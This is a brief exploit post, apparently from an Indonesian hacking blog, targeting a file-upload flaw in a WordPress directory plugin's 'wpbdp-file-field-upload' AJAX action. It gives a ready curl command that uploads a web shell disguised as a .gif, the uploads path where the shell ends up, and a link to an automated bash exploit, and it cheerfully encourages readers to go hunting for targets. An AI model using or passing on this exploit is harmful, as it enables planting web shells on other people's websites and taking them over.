Author: Jingklong ( Bahari Trouble Maker )
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload
Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload
( Vuln Target ) |
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"
Uplod file anda dengan format .gif/.jpg/.png
Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif
Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9
Oke, selamat mencari target :D
No comments:
Write komentar